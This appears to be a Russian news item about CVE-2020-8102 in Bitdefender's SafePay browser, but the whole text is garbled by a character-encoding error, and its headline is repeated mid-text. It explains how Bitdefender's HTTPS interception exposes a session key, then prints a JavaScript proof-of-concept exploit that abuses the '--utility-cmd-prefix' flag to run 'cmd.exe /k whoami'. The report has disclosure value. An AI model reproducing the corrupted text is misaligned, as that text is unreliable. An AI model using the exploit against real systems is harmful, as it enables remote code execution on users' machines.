Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Π·Π°Ρ‰ΠΈΡ‰Ρ‘Π½Π½ΠΎΠΌ Π±Ρ€Π°ΡƒΠ·Π΅Ρ€Π΅ Bitdefender SafePay, приводящая ΠΊ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΡŽ ΠΊΠΎΠ΄Π°

Π’Π»Π°Π΄ΠΈΠΌΠΈΡ€ ΠŸΠ°Π»Π°Π½Ρ‚, ΡΠΎΠ·Π΄Π°Ρ‚Π΅Π»ΡŒ Adblock Plus, выявил ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ (CVE-2020-8102) Π² основанном Π½Π° Π΄Π²ΠΈΠΆΠΊΠ΅ Chromium спСциализированном web-Π±Ρ€Π°ΡƒΠ·Π΅Ρ€Π΅ Safepay, ΠΏΡ€Π΅Π΄Π»Π°Π³Π°Π΅ΠΌΠΎΠΌ Π² составС антивирусного ΠΏΠ°ΠΊΠ΅Ρ‚Π° Bitdefender Total Security 2020 ΠΈ Π½Π°Ρ†Π΅Π»Π΅Π½Π½ΠΎΠΌ Π½Π° ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ бСзопасности Ρ€Π°Π±ΠΎΡ‚Ρ‹ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ Π² глобальной сСти (Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, прСдоставляСтся Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Π°Ρ изоляция ΠΏΡ€ΠΈ ΠΎΠ±Ρ€Π°Ρ‰Π΅Π½ΠΈΠΈ ΠΊ Π±Π°Π½ΠΊΠ°ΠΌ ΠΈ ΠΏΠ»Π°Ρ‚Ρ‘ΠΆΠ½Ρ‹ΠΌ систСмам). Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π΄Π°Ρ‘Ρ‚ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ ΠΎΡ‚ΠΊΡ€Ρ‹Π²Π°Π΅ΠΌΡ‹ΠΌ Π² Π±Ρ€Π°ΡƒΠ·Π΅Ρ€Π΅ сайтам Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄ Π½Π° ΡƒΡ€ΠΎΠ²Π½Π΅ ΠΎΠΏΠ΅Ρ€Π°Ρ†ΠΈΠΎΠ½Π½ΠΎΠΉ систСмы.

ΠŸΡ€ΠΈΡ‡ΠΈΠ½Π° ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡ‹ Π² Ρ‚ΠΎΠΌ, Ρ‡Ρ‚ΠΎ антивирус Bitdefender выполняСт Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹ΠΉ ΠΏΠ΅Ρ€Π΅Ρ…Π²Π°Ρ‚ HTTPS-Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ° Ρ‡Π΅Ρ€Π΅Π· ΠΏΠΎΠ΄ΠΌΠ΅Π½Ρƒ ΠΎΡ€ΠΈΠ³ΠΈΠ½Π°Π»ΡŒΠ½ΠΎΠ³ΠΎ TLS-сСртификата сайта. На систСмС ΠΊΠ»ΠΈΠ΅Π½Ρ‚Π° устанавливаСтся Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΡ€Π½Π΅Π²ΠΎΠΉ сСртификат, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰ΠΈΠΉ ΡΠΊΡ€Ρ‹Ρ‚ΡŒ Ρ€Π°Π±ΠΎΡ‚Ρƒ примСняСмой систСмы инспСктирования Ρ‚Ρ€Π°Ρ„ΠΈΠΊΠ°. Антивирус вклиниваСтся Π² Π·Π°Ρ‰ΠΈΡ‰Ρ‘Π½Π½Ρ‹ΠΉ Ρ‚Ρ€Π°Ρ„ΠΈΠΊ ΠΈ подставляСт Π² Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ страницы собствСнный JavaScript-ΠΊΠΎΠ΄ для Ρ€Π΅Π°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΈ Safe Search, Π° Π² случаС ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌ с сСртификатом Π·Π°Ρ‰ΠΈΡ‰Ρ‘Π½Π½ΠΎΠ³ΠΎ соСдинСния подмСняСт Π²Ρ‹Π΄Π°Π²Π°Π΅ΠΌΡƒΡŽ страницу с ошибкой Π½Π° ΡΠΎΠ±ΡΡ‚Π²Π΅Π½Π½ΡƒΡŽ. Π’Π°ΠΊ ΠΊΠ°ΠΊ новая страница с ошибкой выдаётся ΠΎΡ‚ ΠΈΠΌΠ΅Π½ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Π²Π°Π΅ΠΌΠΎΠ³ΠΎ сСрвСра, Π΄Ρ€ΡƒΠ³ΠΈΠ΅ страницы Π΄Π°Π½Π½ΠΎΠ³ΠΎ сСрвСра ΠΈΠΌΠ΅ΡŽΡ‚ ΠΏΠΎΠ»Π½Ρ‹ΠΉ доступ ΠΊ содСрТимому, вставляСмому Bitdefender.

ΠŸΡ€ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠΈ ΠΏΠΎΠ΄ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»ΡŒΠ½ΠΎΠ³ΠΎ Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΡƒ сайта, этот сайт ΠΌΠΎΠΆΠ΅Ρ‚ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΈΡ‚ΡŒ запрос XMLHttpRequest ΠΈ ΡΠΈΠΌΡƒΠ»ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΏΡ€ΠΈ ΠΎΡ‚Π²Π΅Ρ‚Π΅ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡ‹ с HTTPS-сСртификатом, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΈΠ²Π΅Π΄Ρ‘Ρ‚ ΠΊ Π²ΠΎΠ·Π²Ρ€Π°Ρ‚Ρƒ страницы с ошибкой, ΠΏΠΎΠ΄ΠΌΠ΅Π½Ρ‘Π½Π½ΠΎΠΉ Bitdefender. Π’Π°ΠΊ ΠΊΠ°ΠΊ страница с ошибкой ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Π° Π² контСкстС Π΄ΠΎΠΌΠ΅Π½Π° Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰Π΅Π³ΠΎ, ΠΎΠ½ ΠΌΠΎΠΆΠ΅Ρ‚ ΠΏΡ€ΠΎΡ‡ΠΈΡ‚Π°Ρ‚ΡŒ содСрТимоС ΠΏΠΎΠ΄ΠΌΠ΅Π½Ρ‘Π½Π½ΠΎΠΉ страницы с ΠΏΠ°Ρ€Π°ΠΌΠ΅Ρ‚Ρ€Π°ΠΌΠΈ Bitdefender. На подставляСмой Bitdefender страницС Π² Ρ‚ΠΎΠΌ числС присутствуСт сСссионный ΠΊΠ»ΡŽΡ‡, ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡŽΡ‰ΠΈΠΉ ΠΏΡ€ΠΈ ΠΏΠΎΠΌΠΎΡ‰ΠΈ Π²Π½ΡƒΡ‚Ρ€Π΅Π½Π½Π΅Π³ΠΎ API Bitdefender Π·Π°ΠΏΡƒΡΡ‚ΠΈΡ‚ΡŒ ΠΎΡ‚Π΄Π΅Π»ΡŒΠ½Ρ‹ΠΉ сСанс Π±Ρ€Π°ΡƒΠ·Π΅Ρ€Π° Safepay, ΡƒΠΊΠ°Π·Π°Π² ΠΏΡ€ΠΈ этом ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹Π΅ Ρ„Π»Π°Π³ΠΈ ΠΊΠΎΠΌΠ°Π½Π΄Π½ΠΎΠΉ строки, ΠΈ Π΄ΠΎΠ±ΠΈΡ‚ΡŒΡΡ запуска Π»ΡŽΠ±Ρ‹Ρ… систСмных ΠΊΠΎΠΌΠ°Π½Π΄ ΠΏΡ€ΠΈ ΠΏΠΎΠΌΠΎΡ‰ΠΈ Ρ„Π»Π°Π³Π° «—utility-cmd-prefix». ΠŸΡ€ΠΈΠΌΠ΅Ρ€ эксплоита (param1 ΠΈ param2 — значСния, ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½Π½Ρ‹Π΅ со страницы с ошибкой):

var request = new XMLHttpRequest();
request.open(«POST», Math.random());
request.setRequestHeader(«Content-type», «application/x-www-form-urlencoded»);
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send(«data:text/html,nada —utility-cmd-prefix=\»cmd.exe /k whoami & echo\»»);

Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Π·Π°Ρ‰ΠΈΡ‰Ρ‘Π½Π½ΠΎΠΌ Π±Ρ€Π°ΡƒΠ·Π΅Ρ€Π΅ Bitdefender SafePay, приводящая ΠΊ Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΡŽ ΠΊΠΎΠ΄Π°

Напомним, Ρ‡Ρ‚ΠΎ ΠΏΡ€ΠΎΠ²Π΅Π΄Ρ‘Π½Π½ΠΎΠ΅ Π² 2017 Π³ΠΎΠ΄Ρƒ исслСдованиС ΠΏΠΎΠΊΠ°Π·Π°Π»ΠΎ, Ρ‡Ρ‚ΠΎ 24 ΠΈΠ· 26 протСстированных антивирусных ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ², ΠΈΠ½ΡΠΏΠ΅ΠΊΡ‚ΠΈΡ€ΡƒΡŽΡ‰ΠΈΡ… HTTPS-Ρ‚Ρ€Π°Ρ„ΠΈΠΊ Ρ‡Π΅Ρ€Π΅Π· ΠΏΠΎΠ΄ΠΌΠ΅Π½Ρƒ сСртификатов, сниТали ΠΎΠ±Ρ‰ΠΈΠΉ ΡƒΡ€ΠΎΠ²Π΅Π½ΡŒ бСзопасности HTTPS-соСдинСния.
ΠΠΊΡ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Π΅ Π½Π°Π±ΠΎΡ€Ρ‹ ΡˆΠΈΡ„Ρ€ΠΎΠ² ΠΏΡ€Π΅Π΄ΠΎΡΡ‚Π°Π²Π»ΡΠ»ΠΈΡΡŒ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π² 11 ΠΈΠ· 26 ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ². 5 систСм Π½Π΅ осущСствляли Π²Π΅Ρ€ΠΈΡ„ΠΈΠΊΠ°Ρ†ΠΈΡŽ сСртификатов (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). ΠŸΡ€ΠΎΠ΄ΡƒΠΊΡ‚Ρ‹ Kaspersky Internet Security ΠΈ Total Security Π±Ρ‹Π»ΠΈ ΠΏΠΎΠ΄Π²Π΅Ρ€ΠΆΠ΅Π½Ρ‹ Π°Ρ‚Π°ΠΊΠ΅ CRIME, Π° ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Ρ‹ AVG, Bitdefender ΠΈ Bullguard Π°Ρ‚Π°ΠΊΠ°ΠΌ Logjam ΠΈ POODLE. ΠŸΡ€ΠΎΠ΄ΡƒΠΊΡ‚ Dr.Web Antivirus 11 позволяСт ΠΎΡ‚ΠΊΠ°Ρ‚ΠΈΡ‚ΡŒΡΡ Π½Π° Π½Π΅Π½Π°Π΄Ρ‘ΠΆΠ½Ρ‹Π΅ экспортныС ΡˆΠΈΡ„Ρ€Ρ‹ (Π°Ρ‚Π°ΠΊΠ° FREAK).

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: opennet.ru

Π”ΠΎΠ±Π°Π²ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠΌΠ΅Π½Ρ‚Π°Ρ€ΠΈΠΉ